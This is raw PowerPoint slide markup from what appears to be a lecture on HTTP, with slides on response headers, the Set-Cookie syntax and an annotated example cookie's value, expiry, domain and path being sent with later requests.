            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="54462" y="0"/>
              <a:ext cx="13084759" cy="1009198"/>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545" name="&lt;html&gt; …… &lt;/html&gt;">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D656BFE6-1531-18DF-C3F7-FD49AEB62789}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="52161"/>
              <a:ext cx="6633630"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a:solidFill>
                    <a:srgbClr val="FEFEFE"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:ea typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                  <a:sym typeface="Courier"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>&lt;html&gt; …… &lt;/html&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="Headers">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83B1D26-6561-BAEA-F2B5-B8B16C00ADB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2794953" y="7167562"/>
            <a:ext cx="266178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Headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="Data">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A79DC19-A1FC-DE0A-AF18-086C3AFFAE8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3359880" y="11687054"/>
            <a:ext cx="153192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Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="Rounded Rectangle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBB27676-0F99-294F-8E84-E6F5AA907CF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6335339" y="5700382"/>
            <a:ext cx="1072208" cy="480751"/>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50" name="Set-Cookie:key=value; options; ….">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{117EE468-D5BA-75E6-D848-7202E7103D2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7211059" y="2379844"/>
            <a:ext cx="996188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a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Set-Cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>options</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>; ….</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="Cookies are key-value pairs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1873A57A-EDAC-F5AB-1612-35771A4A92E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1048215" y="261386"/>
            <a:ext cx="22257834" cy="210228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lvl1pPr defTabSz="443991">
              <a:defRPr sz="8512"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP response contains cookies</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="Rounded Rectangle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E93EF06-9D9E-A48D-C21D-55A3C6F6BEF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7478939" y="5700382"/>
            <a:ext cx="466735" cy="480751"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19102"/>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53" name="Rounded Rectangle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44312894-FE7B-9CD1-22A2-77A47B1474CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7935213" y="5687408"/>
            <a:ext cx="9791956" cy="480751"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18545"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208001690"/>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4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5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P spid="552" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="553"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A04794-AD5D-F435-0C83-C34B3D38B847}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="Cookies">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B3F5935-8249-F0CB-4876-6A69F2A42F85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="606352"/>
            <a:ext cx="15609094" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="556" name="Screen Shot 2014-02-18 at 3.27.40 AM.png" descr="Screen Shot 2014-02-18 at 3.27.40 AM.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AD271E7-EF82-F529-C1E6-857CF98CE4E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect t="29040" b="65659"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4444416" y="3156220"/>
            <a:ext cx="17640133" cy="514639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Browser">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0113F624-B64A-9098-AAFC-84A5CF3C6C99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4454547" y="5327795"/>
            <a:ext cx="3637475" cy="2678907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="558" name="Client">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A192596-FFF0-C9AF-B43D-D2921D56FD59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5383966" y="4239490"/>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559" name="Rounded Rectangle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BC26AD0-F6A7-AC0F-B63F-2C0E2C291E5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3780477" y="5183034"/>
            <a:ext cx="4985614" cy="6276294"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6555"/>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60" name="(Private)…">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34018AFB-FFAD-21D8-0534-F9528A427FAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4933831" y="9367899"/>
            <a:ext cx="2678907" cy="1936069"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9840"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>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p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>(Private)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Line">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B69ABEE3-C877-BC45-CEE5-84AAFBF68187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6273283" y="8111887"/>
            <a:ext cx="1" cy="1150827"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="564" name="Group">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73468888-7407-05CE-C4E6-FE6F76C57AF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8014781" y="3922581"/>
            <a:ext cx="2356988" cy="2678908"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2356986" cy="2678906"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="562" name="Line">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B47AC71E-A91B-1FAC-6E9E-514A386AE980}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2594858"/>
              <a:ext cx="2356987" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1524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563" name="Line">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49BA6E0-B936-DD3B-CBE1-4E935BF9D4A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2279684" y="0"/>
              <a:ext cx="1" cy="2678907"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="152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sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="Store “us” under the key “edition”…">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49382CC-9663-E04B-CEBF-7FE16219EFC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11927525" y="5408040"/>
            <a:ext cx="8531140" cy="708687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pPr marL="450673" indent="-450673" algn="l" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3650"/>
            </a:pPr>
            <a:r>
              <a:t>Store “us” under the key “edition”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="450673" indent="-450673" algn="l" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3650"/>
            </a:pPr>
            <a:r>
              <a:t>This value is no good as of Wed Feb 18…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="450673" indent="-450673" algn="l" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3650"/>
            </a:pPr>
            <a:r>
              <a:t>This value should only be readable by any domain ending in </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>.zdnet.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="450673" indent="-450673" algn="l" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3650"/>
            </a:pPr>
            <a:r>
              <a:t>This should be available to any resource within a subdirectory of </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="450673" indent="-450673" algn="l" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3650">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Send the cookie with any future requests to </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;domain&gt;/&lt;path&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566" name="Rounded Rectangle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55291EA3-F87F-48EA-52C3-E778240456EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6616231" y="3154405"/>
            <a:ext cx="1902227" cy="480752"/>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67" name="Rounded Rectangle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97F0F727-FD23-98E3-C3F4-95806278BAA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8565137" y="3154405"/>
            <a:ext cx="6925285" cy="480752"/>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68" name="Rounded Rectangle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA481F58-96FC-EF9C-7C1E-6919B71C25FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16895768" y="3154405"/>
            <a:ext cx="3408655" cy="480752"/>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569" name="Rounded Rectangle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A8A5C99-7CF8-2397-C1D2-9397A416FBAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15524666" y="3154405"/>
            <a:ext cx="1334154" cy="480752"/>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spc="-32">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570" name="Semantics">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CA1295F-9636-5326-7941-51470570A635}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14527032" y="4416349"/>
            <a:ext cx="333212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u="sng">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Semantics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13093564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6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6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5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565">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5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65">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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56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565">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>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5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565">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animBg="1" advAuto="0"/>
      <p:bldP spid="565" grpId="0" build="p" bldLvl="5" animBg="1" advAuto="0"/>
      <p:bldP spid="566" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="567" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="568" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="569"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69C97-836D-2037-7C9D-1D291E55E79C}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572" name="Requests with cookies">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{771F779F-6390-FEBD-9332-4F4EBB02FA10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4811963" y="601904"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Requests with cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="573" name="Screen Shot 2014-02-18 at 3.27.40 AM.png" descr="Screen Shot 2014-02-18 at 3.27.40 AM.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC932E3C-D4CF-474A-4CBA-10C7715A59D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect b="62032"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4078604" y="2786006"/>
            <a:ext cx="15609095" cy="3262491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="576" name="Group">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67679905-EEB6-8980-3E4E-4747CC50FBBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11516775" y="6273552"/>
            <a:ext cx="6655114" cy="1350451"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6655112" cy="1350450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="574" name="Arrow">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09B0D4D3-399F-B426-4D9C-F62B4A4A2D98}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="-1" y="-1"/>
              <a:ext cx="1350452" cy="1350452"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 32000"/>
                <a:gd name="adj2" fmla="val 45511"/>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575" name="Subsequent visit">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34849523-98C3-CD94-DC9B-74EE008536D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1418607" y="222787"/>
              <a:ext cx="523650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b="1">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Subsequent visit</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="580" name="Group">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC26B322-74FA-BFC8-A71E-96424F597179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4151397" y="7726993"/>
            <a:ext cx="16217103" cy="5182179"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="16217101" cy="5182178"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="577" name="Screen Shot 2014-02-18 at 5.23.02 AM.png" descr="Screen Shot 2014-02-18 at 5.23.02 AM.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
